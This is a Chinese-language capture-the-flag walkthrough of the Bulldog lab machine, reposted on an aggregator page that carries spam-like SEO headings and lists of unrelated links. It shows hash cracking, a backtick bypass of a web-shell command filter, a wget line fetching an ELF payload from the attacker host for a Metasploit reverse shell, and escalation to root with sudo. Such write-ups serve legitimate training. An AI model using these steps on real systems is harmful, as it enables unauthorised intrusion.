当前位置: 首页 > wzjs >正文

手游传奇开服网站互联网营销方案策划

手游传奇开服网站,互联网营销方案策划,网络推广策划培训班,海口网站建设好声明 文中涉及操作均来自靶机虚拟环境,禁止用于真实环境,任何未经授权的渗透测试都是违法行为! 开搞 首先nmap扫描目标机开放端口和服务 访问80端口 扫目录撒 发现登录口 点击web-shell提示登录后才能使用 /dev/下面查看网页源码发现村咋h…

声明

文中涉及操作均来自靶机虚拟环境,禁止用于真实环境,任何未经授权的渗透测试都是违法行为!

开搞

首先nmap扫描目标机开放端口和服务

在这里插入图片描述

访问80端口

在这里插入图片描述

扫目录撒

在这里插入图片描述

发现登录口

在这里插入图片描述
在这里插入图片描述
点击web-shell提示登录后才能使用

在这里插入图片描述

/dev/下面查看网页源码发现村咋hash值

在这里插入图片描述

awk提取hash

把那堆复制到1.txt中提取
在这里插入图片描述

在线解密

https://crackstation.net/
在这里插入图片描述

nick/bulldog登录

在这里插入图片描述

进入web-shell

可以执行命令
在这里插入图片描述
但是很多命令不让用
在这里插入图片描述
可以用echo `curl` 的方法绕过限制
在这里插入图片描述

创建反弹shell

python起个服务

在这里插入图片描述

wget下载到目标

echo `wget http://192.168.2.129:5555/5555.elf`

在这里插入图片描述

msf建立监听

在这里插入图片描述

给5555.elf添加执行权限并执行

在这里插入图片描述

拿到shell

在这里插入图片描述

进入shell

在这里插入图片描述

查看家目录有啥

在这里插入图片描述

查看hiddenadmindirectory

查看note
在这里插入图片描述

密码藏在customPermissionApp

SUPERultimatePASSWORDyouCANTget
在这里插入图片描述

结束

因为这个文件是bulldogadmin的文件,我的身份是django,所以需要sudo 去给他加执行权限,sudo chmod 777 customPermissionApp就要用到django的密码
执行后变成了root权限
靶标一般就在root目录下
在这里插入图片描述

http://www.dtcms.com/wzjs/593443.html

相关文章:

  • 网站托管服务wordpress头像 换多说
  • 手机网站建立免费平台wordpress 多个网站
  • 网站没被收录什么原因欧美免费1级做爰片在线观看网站
  • 成都网站建设成都网络公司做产品目录设计用什么网站好
  • 高端娱乐网站建设宁波网站建设计
  • 微信网站后台网上购物商城系统论文
  • 营销网站优化seo天津大良网站建设
  • 免费自助建站模板南京企业网站搭建
  • 站长之家权重查询wordpress4.9.8
  • 东道网站建设wordpress登陆错误
  • 微站官网国内网站要备案
  • 网站策划与维护网站网页设计项目计划书
  • 九江做网站山东网络推广优化排名
  • 网站建设落地页夜猫直播视频下载
  • 微网站制作平台哪个好广州网站建设出售
  • 网站开发评估与调整网站全站出售
  • 交互设计网站案例wordpress 仿钛媒体
  • 体育设施建设发布有没有网站网页qq属于什么
  • 织梦网站密码怎么做网站导流生意
  • 天津企业网站建设网站开发分析模板
  • 网站不备案支付宝接口h5制作的炫酷个人网站
  • 购物网站开题报告vps主机可以做几个网站
  • 做软装什么网站可以网站怎么做电脑系统下载软件
  • 珠宝营销型网站设计科技新闻最新消息10条
  • 门户网站的主要特点游戏软件开发定制
  • wordpress 减少head福州专业的seo软件
  • 做平面有什么好的网站上海网站快速排名优化
  • 展示设计网站有哪些网络网页设计师
  • 网站推广包含哪些方法wordpress主题自定义
  • 服务器和域名如何做网站WordPress目录和连接关系